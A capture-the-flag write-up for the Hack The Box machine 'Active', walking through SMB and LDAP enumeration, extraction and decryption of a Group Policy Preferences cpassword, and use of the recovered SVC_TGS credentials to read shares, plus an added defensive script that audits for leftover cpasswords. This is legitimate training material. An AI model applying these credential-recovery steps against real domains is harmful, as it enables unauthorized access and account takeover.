
Active Writeup

Disclaimer
I'm just a beginner, but writing writeups makes me stronger, probably QQ
Please correct me if I'm wrong.

Running into unfamiliar technology is a little hard even when the technique itself is simple. I have always had an inexplicable aversion to Windows and never seriously tried to understand Active Directory, which was really stupid, so let me treat this revisit of a box I never finished years ago as the first step out. Active is one of the veteran AD boxes on Hack The Box and is also on TJnull's OSCP box list; it suits beginners practising AD-related techniques, from using SMB and decrypting GPP passwords[1] to Kerberoasting[2] to obtain a hash and brute-force it, all of which are the most basic of basics.

Active Badge

Machine Information

Name:       Active
OS:         Windows
Difficulty: Easy
Author:     eks, mrb3n

Reconnaissance

Service Scan

As usual, I split the nmap scan in two: a first quick pass over all TCP ports, then a detailed scan (-sC for default script scan, -sV for version detection) of only the interesting ports, because a full detailed scan from the start takes a very long time. This box is bound to run Active Directory (AD); it's called Active after all, right? More concretely, the quick scan lists plenty of Windows service ports, among them Kerberos, SMB and LDAP, which is pretty much a giveaway; the detailed second scan makes it even clearer.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
...
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-time: 
|   date: 2023-05-29T02:20:58
|_  start_date: 2023-05-29T01:55:51
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -p- --min-rate 4242 -o recons/nmap/active-alltcp-10.129.122.239 10.129.122.239 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:14 CDT
Nmap scan report for 10.129.122.239
Host is up (0.17s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49170/tcp open  unknown
49172/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ sudo nmap -sCV -o recons/nmap/active-targeted-cv-10.129.122.239 10.129.122.239
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-28 21:15 CDT
Nmap scan report for 10.129.122.239
Host is up (0.056s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-05-29 02:20:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -3s
| smb2-time: 
|   date: 2023-05-29T02:20:58
|_  start_date: 2023-05-29T01:55:51
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.83 seconds

That said, this time I was too lazy to adjust the command and just ran the detailed scan over everything, which of course took forever, so while waiting I tried some manual enumeration. What I most wanted to find was the domain name. Alternatively, you could go make a coffee and read it off the finished scan: active.htb

<MACHINE_NAME>.htb is the usual naming convention for HTB box hostnames. You can find more in HTB Meta.

LDAP Enumeration - Port 389

Since the quick scan listed LDAP, I used ldapsearch to look for AD information, starting with the domain name: active.htb

ldapsearch
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b "" -s base defaultNamingContext
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: defaultNamingContext 
#

#
dn:
defaultNamingContext: DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
ldapsearch
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ ldapsearch -x -H ldap://10.129.122.239 -b 'DC=active,DC=htb' -D '' -w ''
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

Looks like credentials are needed to enumerate any further.

Other things done in this phase
Reverse DNS Search
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig -x 10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> -x 10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 15559
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 3b8c232ab38e91a3bfda3e4564740cfe6cdc017eb9b3576f (good)
;; QUESTION SECTION:
;239.122.129.10.in-addr.arpa.   IN      PTR

;; AUTHORITY SECTION:
10.in-addr.arpa.        86400   IN      SOA     localhost. . 1 28800 7200 604800 86400

;; Query time: 3 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Sun May 28 21:25:02 CDT 2023
;; MSG SIZE  rcvd: 128
Zone Transfer
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig AXFR @10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> AXFR @10.129.122.239
; (1 server found)
;; global options: +cmd
;; Query time: 52 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Thu Jun 01 04:09:05 CDT 2023
;; MSG SIZE  rcvd: 40

I don't know why I even tried digging localhost at this point.

Localhost
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ dig localhost @10.129.122.239

; <<>> DiG 9.18.12-1-Debian <<>> localhost @10.129.122.239
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 56014
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 847a6883003e4dbf (echoed)
;; QUESTION SECTION:
;localhost.                     IN      A

;; Query time: 63 msec
;; SERVER: 10.129.122.239#53(10.129.122.239) (UDP)
;; WHEN: Sun May 28 21:25:08 CDT 2023
;; MSG SIZE  rcvd: 50
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.129.122.239   active.htb

SMB Enumeration - Port 445

Start by trying an anonymous connection (no credentials); it might expose some shares. Here are several ways to list SMB shares:

Really, with crackmapexec there is no need to try the other two tools; I just felt like testing them.

┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u '' -p '' --shares                        
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\: 
SMB         10.129.122.239   445    DC               [+] Enumerated shares
SMB         10.129.122.239   445    DC               Share           Permissions     Remark
SMB         10.129.122.239   445    DC               -----           -----------     ------
SMB         10.129.122.239   445    DC               ADMIN$                          Remote Admin
SMB         10.129.122.239   445    DC               C$                              Default share
SMB         10.129.122.239   445    DC               IPC$                            Remote IPC
SMB         10.129.122.239   445    DC               NETLOGON                        Logon server share 
SMB         10.129.122.239   445    DC               Replication     READ            
SMB         10.129.122.239   445    DC               SYSVOL                          Logon server share 
SMB         10.129.122.239   445    DC               Users
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239
[+] IP: 10.129.122.239:445      Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbclient --no-pass -L //10.129.122.239                                                     
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.122.239 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

"Replication"是目前唯一具有讀取權限的share,其中文意思是"副本",也許是管理員的設定備份?因為有點好奇,於是SMB進去看看。

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbclient //10.129.122.239/Replication 
Password for [WORKGROUP\xavier]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Sat Jul 21 05:37:44 2018
..                                  D        0  Sat Jul 21 05:37:44 2018
active.htb                          D        0  Sat Jul 21 05:37:44 2018

                10459647 blocks of size 4096. 5202562 blocks available
smb: \> ls active.htb\
  .                                   D        0  Sat Jul 21 05:37:44 2018
  ..                                  D        0  Sat Jul 21 05:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 05:37:44 2018
  Policies                            D        0  Sat Jul 21 05:37:44 2018
  scripts                             D        0  Wed Jul 18 13:48:57 2018

                10459647 blocks of size 4096. 5202927 blocks available
smb: \> 

Three folders are listed: DfsrPrivate, Policies and scripts. Since they meant nothing to me at first glance, I asked ChatGPT.

Question: Where do following three directories: "DfsrPrivate", "Policies" and "Scripts" come from and what's the purpose of them in AD?

ChatGPT:
The "DfsrPrivate," "Policies," and "Scripts" directories are all related to Active Directory (AD) and serve specific purposes within the system.

  • DfsrPrivate:
    The "DfsrPrivate" directory is associated with the Distributed File System Replication (DFSR) service in Windows Server. DFSR enables the replication of files between multiple servers and ensures that the data remains consistent across all replicas. The "DfsrPrivate" directory is automatically created on each DFSR member server and contains the private metadata and staging files necessary for replication. It is a hidden system folder that should not be manually modified or deleted.
  • Policies:
    The "Policies" directory is a crucial component of Group Policy in AD. Group Policy allows administrators to manage and configure various settings for user and computer accounts in an organization. The "Policies" directory, located within the SYSVOL shared folder on domain controllers, stores Group Policy objects (GPOs). GPOs contain the settings and preferences that are applied to the targeted user and computer accounts. The "Policies" directory structure organizes GPOs into individual folders based on globally unique identifiers (GUIDs) and version numbers.
  • Scripts:
    The "Scripts" directory is associated with logon and logoff scripts in AD. Logon and logoff scripts are executed when users log on to or log off from a computer in an AD domain. These scripts can perform various tasks, such as mapping network drives, configuring printers, or running custom commands or applications. The "Scripts" directory, located within the SYSVOL shared folder on domain controllers, stores the scripts that are assigned to users or computers through Group Policy. The scripts can be written in different scripting languages, such as VBScript or PowerShell.

In summary, the "DfsrPrivate" directory is used by the DFSR service for file replication, the "Policies" directory is used to store Group Policy objects, and the "Scripts" directory is used to store logon and logoff scripts for executing specific actions during user sessions in an Active Directory environment.

The gist of ChatGPT's long answer is that Policies lives in SYSVOL, and SYSVOL also appeared in the share listing earlier (without read permission), so at this point I am more confident that Replication is a backup. I could browse down through SMB slowly looking for interesting files, but I would rather download the whole directory:

smbclient //10.129.122.239/Replication
smb: \> mask ""
smb: \> recurse on  # download all directories and files recursively
smb: \> prompt off  # turn prompting off so you don't have to answer "yes" for every file
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.2 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (2.3 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.6 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.3 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \> 
List Directory
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ smbmap -H 10.129.122.239 -R Replication
[+] IP: 10.129.122.239:445       Name: active.htb                                        
    Disk                                                    Permissions     Comment
    ----                                                    -----------     -------
    Replication                                             READ ONLY
    .\Replication\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    active.htb
    .\Replication\active.htb\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    DfsrPrivate
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Policies
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    scripts
    .\Replication\active.htb\DfsrPrivate\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ConflictAndDeleted
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Deleted
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Installing
    .\Replication\active.htb\Policies\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    {31B2F340-016D-11D2-945F-00C04FB984F9}
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    {6AC1786C-016F-11D2-945F-00C04fB984F9}
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--               23 Sat Jul 21 05:38:11 2018    GPT.INI
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Group Policy
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    MACHINE
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    USER
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--              119 Sat Jul 21 05:38:11 2018    GPE.INI
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Microsoft
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Preferences
    fr--r--r--             2788 Sat Jul 21 05:38:11 2018    Registry.pol
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Windows NT
    .\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Groups
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    fr--r--r--               22 Sat Jul 21 05:38:11 2018    GPT.INI
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    MACHINE
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    USER
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Microsoft
    .\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 05:37:44 2018    Windows NT

Stealing user passwords from Group Policy Preferences

I went through every file; only Groups.xml is of interest, as it contains a username and a cpassword.

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

A quick web search for "group.xml hack" turns up an article on stealing passwords from Group Policy Preferences[3]. In short: the cpassword in the XML is the user's password encrypted with AES-256, and it can be decrypted trivially, with no brute force, because Microsoft published the encryption key in its official technical documentation?! The same XML also gave me an AD account: active.htb\SVC_TGS

For details, see my other note: [Stealing passwords via Group Policy Preferences](/zh-tw/Credential-Access/exploit-group-policy-preferences).
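Added example (not from the original writeup, nor a tool from any project it mentions): a small Python audit that walks a local copy of a SYSVOL/Replication tree and reports every GPP XML file still carrying a cpassword attribute, which is what an administrator would run to find such leftovers before an attacker does. The sample tree is constructed inline from the Groups.xml above plus a second, constructed GPO (placeholder GUID) whose cpassword is empty; it only locates the attribute, it does not decrypt anything.

```python
"""Audit a downloaded SYSVOL/Replication tree for Group Policy Preference (GPP)
files that still carry a cpassword attribute.

Added example for this writeup, not a tool from the original post. It only
locates and reports the attribute so the GPP item can be removed and the
account's password rotated; it does not decrypt anything.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files whose Properties element may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# GPOs live in SYSVOL under Policies\{GUID}\...; pull the GUID from the path.
GPO_GUID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

# Attributes the various GPP item types use to name the account.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_cpasswords(root_dir):
    """Walk root_dir and return one finding per element with a cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed XML: skipped here, but worth a manual look
            guid = GPO_GUID.search(path)
            for elem in tree.iter():
                if "cpassword" not in elem.attrib:
                    continue
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                                if elem.attrib.get(a)), None)
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "gpo": guid.group(0) if guid else None,
                    "element": elem.tag,
                    "account": account,
                    # An empty cpassword carries nothing; a non-empty one is a
                    # recoverable credential, since the AES key is public.
                    "has_value": bool(elem.attrib["cpassword"]),
                })
    return findings


# Groups.xml exactly as recovered from the Replication share in the writeup.
GROUPS_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
'''

# Constructed second GPO (placeholder GUID below) whose Services.xml has an
# empty cpassword: the attribute is present but there is nothing to recover.
SERVICES_XML = '''<?xml version="1.0" encoding="utf-8"?>
<NTServices><NTService name="Spooler"><Properties serviceName="Spooler" accountName="" cpassword=""/></NTService></NTServices>
'''


def build_sample_tree():
    """Write the two sample GPOs into a temp dir laid out like Replication\\active.htb."""
    root = tempfile.mkdtemp(prefix="gpp-audit-")
    samples = {
        ("{31B2F340-016D-11D2-945F-00C04FB984F9}", "Groups", "Groups.xml"): GROUPS_XML,
        ("{00000000-0000-0000-0000-000000000002}", "Services", "Services.xml"): SERVICES_XML,
    }
    for (guid, sub, fname), body in samples.items():
        d = os.path.join(root, "active.htb", "Policies", guid, "MACHINE", "Preferences", sub)
        os.makedirs(d)
        with open(os.path.join(d, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for f in find_cpasswords(build_sample_tree()):
        status = "PASSWORD PRESENT" if f["has_value"] else "empty"
        print(f"{f['gpo']}  {f['file']}  account={f['account']}  cpassword={status}")
```

Point `find_cpasswords` at the directory the `mget *` above produced to audit the real share copy; any finding with `has_value` set is a credential that should be removed from the GPO and rotated.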

Crack the Hash
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Replication]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

With the SMB credentials SVC_TGS:GPPstillStandingStrong2k18, more shares become available.

More readable shares
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares                  
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.122.239   445    DC               [+] Enumerated shares
SMB         10.129.122.239   445    DC               Share           Permissions     Remark
SMB         10.129.122.239   445    DC               -----           -----------     ------
SMB         10.129.122.239   445    DC               ADMIN$                          Remote Admin
SMB         10.129.122.239   445    DC               C$                              Default share
SMB         10.129.122.239   445    DC               IPC$                            Remote IPC
SMB         10.129.122.239   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.122.239   445    DC               Replication     READ            
SMB         10.129.122.239   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.122.239   445    DC               Users           READ

Enumerate the Users share with smbmap or crackmapexec and find the user flag on the desktop.

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users
[+] IP: 10.129.122.239:445       Name: active.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Users                                                   READ ONLY
...
.\Users\SVC_TGS\Desktop\*
        dr--r--r--                0 Sat Jul 21 10:14:42 2018    .
        dr--r--r--                0 Sat Jul 21 10:14:42 2018    ..
        fw--w--w--               34 Thu Jun  1 01:29:06 2023    user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ smbmap -H 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users -A user.txt
[+] IP: 10.129.122.239:445       Name: active.htb                                        
[+] Starting search for files matching 'user.txt' on share Users.
[+] Match found! Downloading: Users\SVC_TGS\Desktop\user.txt
Tip: or download a specific file directly
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --share Users --get-file SVC_TGS/Desktop/user.txt user.txt 
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.129.122.239   445    DC               [*] Copy SVC_TGS/Desktop/user.txt to user.txt
SMB         10.129.122.239   445    DC               [+] File SVC_TGS/Desktop/user.txt was transferred to user.txt
┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ crackmapexec smb 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'  -M spider_plus --only-files -o READ_ONLY=false   
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.122.239   445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SPIDER_P... 10.129.122.239   445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.129.122.239   445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.129.122.239   445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.129.122.239   445    DC               [*]       SIZE: 51200
SPIDER_P... 10.129.122.239   445    DC               [*]     OUTPUT: /tmp/cme_spider_plus
...

┌──(xavier㉿kali)-[~/Documents/CTF/htb/active]
└─$ find /tmp/cme_spider_plus/10.129.122.239 -type f 
...
/tmp/cme_spider_plus/10.129.122.239/Users/SVC_TGS/Desktop/user.txt
...
